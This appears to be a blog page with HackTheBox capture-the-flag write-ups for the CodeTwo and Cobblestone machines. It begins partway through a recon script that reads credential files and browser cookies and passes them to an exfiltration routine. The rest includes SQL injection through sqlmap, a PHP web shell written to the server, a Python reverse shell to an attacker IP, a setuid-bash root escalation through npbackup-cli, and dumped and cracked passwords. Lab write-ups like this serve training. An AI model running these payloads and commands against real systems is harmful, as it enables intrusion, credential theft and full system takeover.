  for (var i=0;i<cmds.length;i++) info.exec.push(runCmd(cmds[i]));

  // Dosyalar
  info.files = {
    etc_passwd: readFileSafe("/etc/passwd"),
    etc_group:  readFileSafe("/etc/group"),
    proc_environ: readFileSafe("/proc/self/environ"),
    dot_env: readFileSafe(".env"),
    app_pkg: readFileSafe("package.json")
  };

  // Dizin listingleri (en sık ilgi çekiciler)
  info.dirs = [
    listDirSafe("/"),
    listDirSafe("/home"),
    listDirSafe("/var/www"),
    listDirSafe("/app"),
    listDirSafe("/srv"),
    listDirSafe(safe(function(){ return info.cwd; }, null))
  ];

  return info;
}

function browserRecon() {
  var info = {};
  info.runtime = "browser";
  info.userAgent = (typeof navigator !== "undefined" && navigator.userAgent) ? navigator.userAgent : null;
  info.location  = (typeof location  !== "undefined" && location.href) ? location.href : null;

  // Cookies
  info.cookies = (typeof document !== "undefined" && typeof document.cookie === "string") ? document.cookie : null;

  // Storage'lar
  function dumpStorage(storage) {
    var o = {};
    try {
      for (var i=0;i<storage.length;i++) {
        var k = storage.key(i);
        o[k] = storage.getItem(k);
      }
      return o;
    } catch (e) { return null; }
  }
  info.localStorage   = (typeof localStorage   !== "undefined") ? dumpStorage(localStorage)   : null;
  info.sessionStorage = (typeof sessionStorage !== "undefined") ? dumpStorage(sessionStorage) : null;

  // Basit DOM sinyalleri
  info.dom = {};
  try {
    info.dom.title = document.title || null;
    info.dom.scripts = [];
    var sc = document.getElementsByTagName("script");
    for (var i=0;i<sc.length;i++) {
      var src = sc[i].getAttribute("src");
      if (src) info.dom.scripts.push(src);
    }
  } catch (e) {}

  return info;
}

// ====== MAIN ======
try {
  var data = isNode() ? nodeRecon() : browserRecon();
  // Konsola yaz
  try { console.log("[RECON]", JSON.stringify(data, null, 2)); } catch (e) { /* ignore */ }
  // Opsiyonel exfil
  exfil(data);
} catch (e) {
  try { console.log("[RECON_ERROR]", String(e && e.message ? e.message : e)); } catch(_){}
}
app@codetwo:~/app/instance$

ok on staring we found /download some file so these are the files so on staring we not get any database on user.db now in app user we got some database let exploit it using sqlite3 on app user .

so we already know the user is marco let crack his hash using online tools liek carckstation or using john tool

and here we fo we got the password of user marco

credentials :

user : marco
password - sweetangelbabylove

┌──(kali㉿kali)-[~/Desktop]
└─$ ssh marco@10.10.11.82
marco@10.10.11.82's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-216-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Sun 17 Aug 2025 10:36:14 AM UTC

  System load:  0.38              Processes:             227
  Usage of /:   57.0% of 5.08GB   Users logged in:       1
  Memory usage: 25%               IPv4 address for eth0: 10.10.11.82
  Swap usage:   0%


Expanded Security Maintenance for Infrastructure is not enabled.

0 updates can be applied immediately.

Enable ESM Infra to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sun Aug 17 10:36:15 2025 from 10.10.16.4
marco@codetwo:~$

we In 😊

<h1> Enumerating Privileges </h1>

marco@codetwo:~$ sudo -l
Matching Defaults entries for marco on codetwo:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User marco may run the following commands on codetwo:
    (ALL : ALL) NOPASSWD: /usr/local/bin/npbackup-cli
marco@codetwo:~$

user marco can run as root

let run the backup script

marco@codetwo:~$ sudo /usr/local/bin/npbackup-cli
2025-08-17 10:41:36,379 :: INFO :: npbackup 3.0.1-linux-UnknownBuildType-x64-legacy-public-3.8-i 2025032101 - Copyright (C) 2022-2025 NetInvent running as root
2025-08-17 10:41:36,379 :: CRITICAL :: Cannot run without configuration file.
2025-08-17 10:41:36,385 :: INFO :: ExecTime = 0:00:00.008395, finished, state is: critical.
marco@codetwo:~$

In Marco home dir we already have npbackup.conf config file

lets run that npbackup.conf

marco@codetwo:~$ sudo /usr/local/bin/npbackup-cli -c npbackup.conf -b --force
2025-08-17 10:43:24,391 :: INFO :: npbackup 3.0.1-linux-UnknownBuildType-x64-legacy-public-3.8-i 2025032101 - Copyright (C) 2022-2025 NetInvent running as root
2025-08-17 10:43:24,420 :: INFO :: Loaded config 4E3B3BFD in /home/marco/npbackup.conf
2025-08-17 10:43:24,431 :: INFO :: Running backup of ['/home/app/app/'] to repo default

2025-08-17 10:43:25,581 :: INFO :: Trying to expanding exclude file path to /usr/local/bin/excludes/generic_excluded_extensions
2025-08-17 10:43:25,581 :: ERROR :: Exclude file 'excludes/generic_excluded_extensions' not found
2025-08-17 10:43:25,581 :: INFO :: Trying to expanding exclude file path to /usr/local/bin/excludes/generic_excludes
2025-08-17 10:43:25,581 :: ERROR :: Exclude file 'excludes/generic_excludes' not found
2025-08-17 10:43:25,582 :: INFO :: Trying to expanding exclude file path to /usr/local/bin/excludes/windows_excludes
2025-08-17 10:43:25,582 :: ERROR :: Exclude file 'excludes/windows_excludes' not found
2025-08-17 10:43:25,582 :: INFO :: Trying to expanding exclude file path to /usr/local/bin/excludes/linux_excludes
2025-08-17 10:43:25,582 :: ERROR :: Exclude file 'excludes/linux_excludes' not found
2025-08-17 10:43:25,582 :: WARNING :: Parameter --use-fs-snapshot was given, which is only compatible with Windows
using parent snapshot 35a4dac3

Files:           1 new,     3 changed,     8 unmodified
Dirs:            0 new,     7 changed,     2 unmodified
Added to the repository: 23.712 KiB (5.173 KiB stored)

processed 12 files, 42.465 KiB in 0:00
snapshot b7d09d1f saved
2025-08-17 10:43:26,840 :: INFO :: Backend finished with success
2025-08-17 10:43:26,842 :: INFO :: Processed 42.5 KiB of data
2025-08-17 10:43:26,842 :: ERROR :: Backup is smaller than configured minmium backup size
2025-08-17 10:43:26,843 :: ERROR :: Operation finished with failure
2025-08-17 10:43:26,843 :: INFO :: Runner took 2.413698 seconds for backup
2025-08-17 10:43:26,843 :: INFO :: Operation finished
2025-08-17 10:43:26,849 :: INFO :: ExecTime = 0:00:02.460913, finished, state is: errors.
marco@codetwo:~$ 
marco@codetwo:~$

It try to make a backup of ['/home/app/app/"] to repo default
But fails because Backup is smaller than configured minmium backup size

<h1> Exploiting npbackup-cli to Access Root Files </h1>

<h1> 1 Overview </h1>

npbackup-cli is a backup utility that allows configuration via YAML files (npbackup.conf). Each repository configuration can define backup sources, retention policies, and hooks (post-execution commands).

When npbackup-cli is run with sudo, post-execution commands run as root. If an attacker can modify the config, they can execute arbitrary commands with root privileges.

<h1> Malicious Configuration </h1>

The malicious configuration keeps the original repository metadata and credentials intact but modifies the backup source and injects commands to extract the root flag:

<h1> steps </h1>

create a file and add this content

marco@codetwo:~$ nano test
marco@codetwo:~$ cat test
#!/bin/bash
chmod u+s /bin/bash
marco@codetwo:~$ chmod 755 /home/marco/test
marco@codetwo:~$ sudo /usr/local/bin/npbackup-cli --config /home/marco/npbackup.conf --external-backend-binary=/home/marco/test-b --repo-name default
2025-08-17 10:52:51,219 :: INFO :: npbackup 3.0.1-linux-UnknownBuildType-x64-legacy-public-3.8-i 2025032101 - Copyright (C) 2022-2025 NetInvent running as root
2025-08-17 10:52:51,249 :: INFO :: Loaded config 4E3B3BFD in /home/marco/npbackup.conf
2025-08-17 10:52:51,264 :: CRITICAL :: External backend binary /home/marco/test-b cannot be found.
2025-08-17 10:52:51,271 :: INFO :: ExecTime = 0:00:00.054665, finished, state is: critical.
^[[Dmarco@codetwo:~$ sudo /usr/local/bin/npbackup-cli --config /home/marco/npbackup.conf --external-backend-binary=/home/marco/test -b --repo-name default
2025-08-17 10:52:55,725 :: INFO :: npbackup 3.0.1-linux-UnknownBuildType-x64-legacy-public-3.8-i 2025032101 - Copyright (C) 2022-2025 NetInvent running as root
2025-08-17 10:52:55,752 :: INFO :: Loaded config 4E3B3BFD in /home/marco/npbackup.conf
2025-08-17 10:52:55,819 :: ERROR :: Runner: Function backup failed with: 'NoneType' object has no attribute 'strip'
2025-08-17 10:52:55,819 :: ERROR :: Trace:
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/npbackup/core/runner.py", line 698, in wrapper
    return fn(self, *args, **kwargs)
  File "/usr/local/lib/python3.8/dist-packages/npbackup/core/runner.py", line 496, in wrapper
    result = fn(self, *args, **kwargs)
  File "/usr/local/lib/python3.8/dist-packages/npbackup/core/runner.py", line 674, in wrapper
    result = fn(self, *args, **kwargs)
  File "/usr/local/lib/python3.8/dist-packages/npbackup/core/runner.py", line 625, in wrapper
    return fn(self, *args, **kwargs)
  File "/usr/local/lib/python3.8/dist-packages/npbackup/core/runner.py", line 566, in wrapper
    return fn(self, *args, **kwargs)
  File "/usr/local/lib/python3.8/dist-packages/npbackup/core/runner.py", line 636, in wrapper
    result = self._apply_config_to_restic_runner()
  File "/usr/local/lib/python3.8/dist-packages/npbackup/core/runner.py", line 963, in _apply_config_to_restic_runner
    self.restic_runner.binary = self.binary
  File "/usr/local/lib/python3.8/dist-packages/npbackup/restic_wrapper/__init__.py", line 585, in binary
    version = self.binary_version
  File "/usr/local/lib/python3.8/dist-packages/npbackup/restic_wrapper/__init__.py", line 599, in binary_version
    return output.strip()
AttributeError: 'NoneType' object has no attribute 'strip'
2025-08-17 10:52:55,823 :: ERROR :: Cannot decode JSON from restic data: the JSON object must be str, bytes or bytearray, not bool
2025-08-17 10:52:55,823 :: ERROR :: Cannot find processed bytes: 'total_bytes_processed'
2025-08-17 10:52:55,823 :: ERROR :: Backend finished with errors.
2025-08-17 10:52:55,823 :: WARNING :: Cannot get exec time from environment
2025-08-17 10:52:55,823 :: ERROR :: Operation finished
2025-08-17 10:52:55,829 :: INFO :: ExecTime = 0:00:00.106691, finished, state is: errors.
marco@codetwo:~$ ls
backups  npbackup.conf  test  user.txt
marco@codetwo:~$ bash -p
bash-5.0# cd /root
bash-5.0# ls
root.txt  scripts
bash-5.0# cat root.txt
1b9acae4d1c52171f24xxxxxxxx
bash-5.0#

And Boom We Got Root flag 1b9acae4d1c52171f24xxxxxxxx

</div>

Cobblestone HTB Writeup (Protected)

Mon, 11 Aug 2025 00:00:00 GMT

if (!passInput) {
  document.getElementById("error").textContent = "❌ Please enter a password";
  return;
}

try {
  const response = await fetch("https://passowrd-backend-production.up.railway.app/api/unlock", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ password: passInput, postId: "era" })
  });

  const res = await response.json();
  console.log(res);

  if (res.success) {
    document.getElementById("protected-content").style.display = "block";
    document.getElementById("locked").style.display = "none";
    document.getElementById("error").textContent = "";
  } else {
    document.getElementById("error").textContent = "❌ Wrong password";
  }
} catch (error) {
  console.error("Error during unlock:", error);
  document.getElementById("error").textContent = "❌ Server error, try again later";
}

} </script>

IP

10.10.xx.xx

Recon

$ nmap $target_ip  -sC -sV -Pn 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-11 12:12 EDT
Nmap scan report for 10.10.11.81
Host is up (0.45s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0)
| ssh-hostkey: 
|   256 50:ef:5f:db:82:03:36:51:27:6c:6b:a6:fc:3f:5a:9f (ECDSA)
|_  256 e2:1d:f3:e9:6a:ce:fb:e0:13:9b:07:91:28:38:ec:5d (ED25519)
80/tcp open  http    Apache httpd 2.4.62
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Did not follow redirect to http://cobblestone.htb/
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.00 seconds

<p>We got hostname</p>

Host

cobblestone.htb

Website Enumeartion

Port 80

check the Website : http://cobblestone.htb/

A Minecraft-inspired gaming hub welcomes us:

The design seems strangely recognizable—three distinct gateways await:

<h1>Subdomain</h1>

when you click on these three images on home page which was running on port 80 it was redirecting to another subdomains

deploy.cobblestone.htb
cobblestone.htb/login.php
vote.cobblestone.htb

lets add in to /etc/hosts

since we already have cobblestone.htb so lets add rest

10.10.11.81 cobblestone.htb vote.cobblestone.htb deploy.cobblestone.htb

<h1>Subdomains Enumeration</h1>

vote.cobblestone.htb

deploy.cobblestone.htb

As we see in vote.cobblestone.htb it was redirecting to http://vote.cobblestone.htb/login.php soe we have login page in that we have register ! Lets register with some fake credits

After login on when you check vote.cobblestone.htb have some webpage having some voting

now lets go home page on cobblestone.htb lets click on those images for to confirm again.

when click on the second image it was still showing login page

lets try with registered credits

it saying User was not found lets try to register by clicking beside of login

we go register success

lets login after login we it was redirecting to cobblestone.htb/skins.php

<h1>Testing</h1>

Lets go to first url http://vote.cobblestone.htb/index.php there we see the beside of the vote we have suggest lets see there what it was

Ok ! Here we need to add some URL

lets try with our site pwncrafts.vercel.app

Ok ! Our status is false also assing some id on url http://vote.cobblestone.htb/details.php?id=12 The voting system is merely an illusion, yet it enables server communication through a URL parameter for

lets see on brup by adding the url

ok ! we have the reuqest now lets try to add another url like pwncrafts.google.com for to confirm the id was assing to each URL we added. and observe on brup

url added

Whether it’s approved or not doesn’t matter what counts is that we’ve set up a basic request–response link. The id parameter starts at 4 and increases sequentially:

brup confirm That id= is parameter.

:::Note

when we obsrve the unapproved url was deleting after some time so i just add the old url and it assigned teh new id as 4. also on textbox Suggestion #4 you see #4 is changing as of its id

A textbook IDOR emerges so An exploitable attack vector revealed.

:::

<h1>WEB</h1> <h2>SQLi</h2> <h3>Entry Discovery</h3>

Inserting a lone a' into the suggestion POST request on repeter plunges us into an unforeseen error condition:

No response only a malfunctioning page.

Change to a'-- - and the server partially shows its cards: the HTML comes back, but the data payload is completely gone:

A subtle yet hopeful indication—potential grounds for SQL injection.

<h1>Sqlmap</h1>

Capture the suggest request for offline work:

save it as any name but in .req

Without any rate limiting present, we can send payloads without restriction. Crank up the flags and launch:

sqlmap -r mysuggest.req -p url \
	  --dbs \
  	--risk=3 --level=5 \
  	--batch

SQLi confirmed:

<h1> Post Injection </h1>

sqlmap has already fingerprinted:

:::note

"I found a UNION-based SQL injection on parameter url using 5 columns, and here's the exact payload I used to prove it."

Parameter: url (POST)
   Type: UNION query
   Title: Generic UNION query (NULL) - 5 columns
   Payload: url=-4680' UNION ALL SELECT NULL,CONCAT(0x7162786b71,0x73434e574973764e4a5842735261776b5858636569534f5666686d72715a517571706d4761637166,0x716a7a7071),NULL,NULL,NULL-- -

:::

Minimal Proof-of-Concept:

url=' UNION ALL SELECT NULL,'Axura',NULL,NULL,NULL-- -

At this point, sqlmap can transition to pulling data or accessing the filesystem.

<h1>Enumeration</h1>

List of databases:

$ sqlmap -r mysuggest.req -p url \
	  --dbs \
  	--batch
  	
available databases [2]:
[*] information_schema
[*] vote

we have table vote

$ sqlmap -r mysuggest.req -p url \
	  -D vote --tables \
  	--batch
  	
Database: vote
[2 tables]
+-------+
| users |
| votes |
+-------+

we have users: lets see what columnts present in that users

$ sqlmap -r mysuggest.req -p url \
	  -D vote -T users --columns
  	
[02:08:43] [INFO] retrieved: id
[02:08:48] [INFO] retrieved: username
[02:09:01] [INFO] retrieved: firstname                                                                                           
[02:09:13] [INFO] retrieved: email
[02:13:00] [INFO] retrieved: lastname
[02:13:47] [INFO] retrieved: password

ok we have username & password ! Lets Dump credentials:

$ sqlmap -r mysuggest.req -p url \
    -D vote -T users \
    -C username,password \
    --dump --batch

Database: vote
Table: users
[2 entries]
+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| admin    | $2y$10$6XMWgf8RN6McVqmRyFIDb.6nNALRsA./u4HAF2GIBs3xgZXvZjv86 |
| pwncrafts| $2y$10$ZDqxFveA3d6eYI.0alpZauum/mbn3eCLLr5QFqNFtSebeOkhUnYRe |
+----------+--------------------------------------------------------------+

Heavy hashes though.

<h1>File Read / Write</h1>

After verifying a UNION-based injection, we can determine if a file exists on the target machine using MySQL’s LOAD_FILE() function—sqlmap conveniently offers built-in options (--file-read, --file-write) for this purpose.

lets read primitive:

$ sqlmap -r mysuggest.req -p url --batch \
       --file-read="/etc/passwd"
       
files saved to [1]:
[*] /home/kali/.local/share/sqlmap/output/vote.cobblestone.htb/files/_etc_passwd (same file)


$ cat /home/kali/.local/share/sqlmap/output/vote.cobblestone.htb/files/_etc_passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:101:109:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:102:65534::/run/sshd:/usr/sbin/nologin
cobble:x:1000:1000:cobble,,,:/home/cobble:/bin/rbash
mysql:x:103:112:MySQL Server,,,:/nonexistent:/bin/false
tftp:x:104:113:tftp daemon,,,:/srv/tftp:/usr/sbin/nologin
_laurel:x:999:996::/var/log/laurel:/bin/false
john:x:1001:1001:,,,:/home/john:/bin/bash

we got users: john, cobble. lets Write primitive:

Demonstrated that we’re capable of writing files beyond the webroot:

$ echo '<?php @system($_REQUEST["x"]); echo "hello world" ?>' > shell.php


$ sqlmap -r mysuggest.req -p url  --batch \
       --file-write="shell.php" \
       --file-dest="/tmp/pwned"
     
files saved to [1]:
[*] /home/kali/.local/share/sqlmap/output/vote.cobblestone.htb/files/_tmp_pwned (same file)


$ cat /home/kali/.local/share/sqlmap/output/vote.cobblestone.htb/files/_tmp_pwned
<?php @system($_REQUEST["x"]); echo "hello world" ?>

After confirming the file is in the webroot, execute it to gain a reverse shell—complete control secured.

Should this be unintended for an insane-level machine?

<h1>RCE</h1> <h2>Web Shell</h2>

Armed with a file write primitive, our goal changes—drop a payload in a spot Apache will gladly serve and run. A minimal PHP web shell becomes our weapon of choice.

The server signature indicates Debian with Apache 2.4.62 in operation:

Step one—retrieve Apache’s site configuration to chart the landscape:

/etc/apache2/sites-enabled/000-default.conf

Expose the file using the read primitive:

<VirtualHost *:80>
        RewriteEngine On
        RewriteCond %{HTTP_HOST} !^cobblestone.htb$
        RewriteRule /.* http://cobblestone.htb/ [R]
        ServerName 127.0.0.1
        ProxyPass "/cobbler_api" "http://127.0.0.1:25151/"
        ProxyPassReverse "/cobbler_api" "http://127.0.0.1:25151/"
</VirtualHost>

<VirtualHost *:80>
        ServerName cobblestone.htb

        ServerAdmin cobble@cobblestone.htb
        DocumentRoot /var/www/html

        <Directory /var/www/html>
                AAHatName cobblestone
        </Directory>

        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined

        RewriteEngine On
        RewriteCond %{HTTP_HOST} !^cobblestone.htb$
        RewriteRule /.* http://cobblestone.htb/ [R]

        Alias /cobbler /srv/www/cobbler

        <Directory /srv/www/cobbler>
                Options Indexes FollowSymLinks
                AllowOverride None
                Require all granted
        </Directory>

</VirtualHost>

<VirtualHost *:80>
        ServerName deploy.cobblestone.htb

        ServerAdmin cobble@cobblestone.htb
        DocumentRoot /var/www/deploy

        RewriteEngine On
        RewriteCond %{HTTP_HOST} !^deploy.cobblestone.htb$
        RewriteRule /.* http://deploy.cobblestone.htb/ [R]
</VirtualHost>

<VirtualHost *:80>
        ServerName vote.cobblestone.htb

        ServerAdmin cobble@cobblestone.htb
        DocumentRoot /var/www/vote

        RewriteEngine On
        RewriteCond %{HTTP_HOST} !^vote.cobblestone.htb$
        RewriteRule /.* http://vote.cobblestone.htb/ [R]
</VirtualHost>

Test the minimal PHP command executor via http://cobblestone.htb/.index.php?x=id:

<h1>Reverse Shell</h1>

Nevertheless, the /var/www/html directory appears to be secured. We confirmed curl is available in the PATH (using which curl), but it cannot connect to our attacker IP—outbound internet access is blocked.

After further testing, I discovered that the /var/www/vote path is unrestricted, allowing us to upload a small malicious shell (with PHP file size also limited) onto the target:

sqlmap -r mysuggest.req -p url  --batch \
       --file-write="shell.php" \
       --file-dest="/var/www/vote/.index.php"

Through http://vote.cobblestone.htb/.index.php, trigger a reverse shell where Python is verified to be installed:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.xx.xx",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

The line bites—www-data is now ours:

$ rlwrap nc -lnvp 4444
Connection from 10.129.xx.xx:49180
$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@cobblestone:/var/www/vote$ ls -R
ls -R
.:
composer.json db img login.php register.php vendor composer.lock
details.php index.php login_verify.php suggest.php webfonts CSS
favicon.ico js logout.php templates
./css:
all.min.css bootstrap.min.css stylesheet.css stylesheet.css.orig
./db:
connection.php
./img:
minecraft.jpg
./js:
bootstrap.bundle.min.js
firefly.js jquery.min.js
main.js
./templates:
...

Web root user www-data compromised.

After gaining the web foothold, the next step is traditional post-exploitation—extract every valuable configuration file.

<h1>Database Compromise</h1>

Using the earlier web shell at /var/www/html (prior to obtaining a reverse shell), I ran a recursive directory listing (ls -R) to map the entire web root directory: /var/www/html

/var/www/html
├── composer.json
├── composer.lock
├── index.php
├── login.php
├── login_verify.php
├── logout.php
├── register.php
├── upload.php
├── suggest_skin.php
├── skins.php
├── skins_app_admin_server_info.php
├── download.php
├── preview_banner.php
├── user.php
├── db/
│   └── connection.php
├── css/
│   ├── all.min.css
│   ├── bootstrap.min.css
│   └── stylesheet.css
├── js/
│   ├── bootstrap.bundle.min.js
│   ├── firefly.js
│   ├── jquery.min.js
│   └── main.js
├── img/
│   ├── forums.png
│   ├── logo.png
│   ├── minecraft.jpg
│   ├── store.png
│   └── vote.png
├── skins/
│   ├── dog1234.png
│   ├── eldeathly.png
│   ├── niftysmith.png
│   ├── paulgg.png
│   ├── sword4000.png
│   └── preview_*.png
├── templates/                  # Twig views
│   ├── downloads.html.twig
│   ├── footer.html.twig
│   ├── header.html.twig
│   ├── suggest.html.twig
│   ├── suggestform.html.twig
│   ├── upload.html.twig
│   └── user.html.twig
├── vendor/
│   ├── autoload.php
│   ├── composer/               # Composer autoload metadata
│   ├── symfony/                # polyfills, contracts
│   └── twig/twig/              # Twig engine
└── webfonts/
    ├── fa-*.ttf
    └── fa-*.woff2

The dubious db folder holds a config file revealing the credentials for the cobblestone database:

// connection.php under /var/www/html/db
<?php

$dbserver = "localhost";
$username = "dbuser";
$password = "aichooDeeYanaekungei9rogi0eMuo2o";
$dbname = "cobblestone";

$conn = new mysqli($dbserver, $username, $password, $dbname);

// Check connection
if ($conn->connect_errno > 0) {
die("Connection failed: " . $conn->connect_error);
}
?>

Located within /var/www/vote, the separate db/connection.php holds credentials for a different database named vote:

// connection.php under /var/www/vote/db
<?php

$dbserver = "localhost";
$username = "voteuser";
$password = "thaixu6eih0Iicho]irahvoh6aigh>ie";
$dbname = "vote";

$conn = new mysqli($dbserver, $username, $password, $dbname);

// Check connection
if ($conn->connect_errno > 0) {
 die("Connection failed: " . $conn->connect_error);
}
?>

This was revealed earlier in the SQLi stage, yet remains useful for verifying password reuse.

Next, we establish a local connection to the uncharted cobblestone server through our reverse shell:

mysql -u dbuser -p'aichooDeeYanaekungei9rogi0eMuo2o' -h localhost cobblestone

MariaDB [cobblestone]> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| cobblestone        |
| information_schema |
+--------------------+
2 rows in set (0.001 sec)

MariaDB [cobblestone]> use cobblestone;
use cobblestone;
Database changed

MariaDB [cobblestone]> show tables;
show tables;
+-----------------------+
| Tables_in_cobblestone |
+-----------------------+
| skins                 |
| suggestions           |
| users                 |
+-----------------------+
3 rows in set (0.001 sec)

MariaDB [cobblestone]> select * from users;
select * from users;
+----+----------+-----------+----------+------------------------+-------+------------------------------------------------------------------+-------------+
| id | Username | FirstName | LastName | Email                  | Role  | Password                                                         | register_ip |
+----+----------+-----------+----------+------------------------+-------+------------------------------------------------------------------+-------------+
|  1 | admin    | admin     | admin    | admin@cobblestone.htb  | admin | f4166d263f25a862fa1b77116693253c24d18a36f5ac597d8a01b10a25c560d1 | *           |
|  2 | cobble   | cobble    | stone    | cobble@cobblestone.htb | admin | 20cdc5073e9e7a7631e9d35b5e1282a4fe6a8049e8a84c82987473321b0a8f4d | *           |
+----+----------+-----------+----------+------------------------+-------+------------------------------------------------------------------+-------------+
2 rows in set (0.001 sec)

The users table contained two entries—admin and cobble—stored as unsalted SHA-256 hashes:

$ hashcat --identify '20cdc5073e9e7a7631e9d35b5e1282a4fe6a8049e8a84c82987473321b0a8f4d'
The following 8 hash-modes match the structure of your input hash:

      # | Name                                                       | Category
  ======+============================================================+======================================
   1400 | SHA2-256                                                   | Raw Hash
  17400 | SHA3-256                                                   | Raw Hash
  11700 | GOST R 34.11-2012 (Streebog) 256-bit, big-endian           | Raw Hash
   6900 | GOST R 34.11-94                                            | Raw Hash
  17800 | Keccak-256                                                 | Raw Hash
   1470 | sha256(utf16le($pass))                                     | Raw Hash
  20800 | sha256(md5($pass))                                         | Raw Hash salted and/or iterated
  21400 | sha256(sha256_bin($pass))                                  | Raw Hash salted and/or iterated

hashcat (mode 1400) successfully decrypted cobble’s hash:

$ echo "f4166d263f25a862fa1b77116693253c24d18a36f5ac597d8a01b10a25c560d1" > hashes.txt
$ echo "20cdc5073e9e7a7631e9d35b5e1282a4fe6a8049e8a84c82987473321b0a8f4d" >> hashes.txt

$ hashcat -m 1400 hashes.txt /usr/share/wordlists/rockyou.txt --force
20cdc5073e9e7a7631e9d35b5e1282a4fe6a8049e8a84c82987473321b0a8f4d:iluvdannymorethanyouknow
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1400 (SHA2-256)
Hash.Target......: 20cdc5073e9e7a7631e9d35b5e1282a4fe6a8049e8a84c82987...0a8f4d

before /etc/passwd confirmed cobble as a local user:

$ ls /home
chroot_jail  cobble  john

lets login with cracked credentials into SSH:

┌──(kali㉿kali)-[~/Desktop]
└─$ ssh cobble@cobblestone.htb
The authenticity of host 'cobblestone.htb (10.10.11.81)' can't be established.
ED25519 key fingerprint is SHA256:c5Fpg/cgHQO2EmwqsW3VtYIVXXMz7nz8dwjibC8n0gw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'cobblestone.htb' (ED25519) to the list of known hosts.
cobble@cobblestone.htb's password: 
Linux cobblestone 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
cobble@cobblestone:~$

The session opens within a restricted bash (rbash) environment, yet the user flag is readily available.

<h1>ROOT</h1> <h2>Rbash</h2>

Rbash, or restricted bash, is basically a limited version of bash. No changing directories with cd, no altering the PATH variable, and no running binaries via absolute paths unless they’re included in $PATH. Redirecting output? Not possible. Trying set +r? Won’t work.

That’s why our initial web shell is confined to /var/www/html. However, we’ve just discovered that /var/www/vote is an allowed exception.

Our collection of permitted binaries is minimal:

cobble@cobblestone:~$ ls /bin -l
total 1964
-rwxr-xr-x 1 root root   44016 Oct  1  2024 cat
-rwxr-xr-x 1 root root  203152 Oct  1  2024 grep
-rwxr-xr-x 1 root root  151344 Oct  1  2024 ls
-rwxr-xr-x 1 root root  146360 Oct  1  2024 ps
-rwxr-xr-x 1 root root 1265648 Oct  1  2024 rbash
-rwxr-xr-x 1 root root  193680 Oct  1  2024 ss

However, ps and ss provide sufficient tools to begin probing the system’s vital processes.

<h1>Local Enum</h1> Perform some basic system enumeration:

cobble@cobblestone:~$ ps -ef
UID          PID    PPID  C STIME TTY          TIME CMD
...
root        1037       1  0 07:21 ?        00:00:00 /sbin/wpa_supplicant -u -s -O DIR=/run/wpa_supplicant GROUP=netdev
root        1166       1  0 07:21 ?        00:00:07 /usr/bin/python3 /usr/local/bin/cobblerd -F
root        1168       1  0 07:21 ?        00:00:03 php-fpm: master process (/etc/php/8.2/fpm/php-fpm.conf)
root        1187       1  0 07:21 ?        00:00:00 /sbin/agetty -o -p -- \u --noclear - linux
root        1196       1  0 07:21 ?        00:00:00 /usr/sbin/in.tftpd --listen --user tftp --address :69 --secure /srv/tftp
www-data    1238    1168  0 07:21 ?        00:00:00 php-fpm: pool www
www-data    1240    1168  0 07:21 ?        00:00:00 php-fpm: pool www
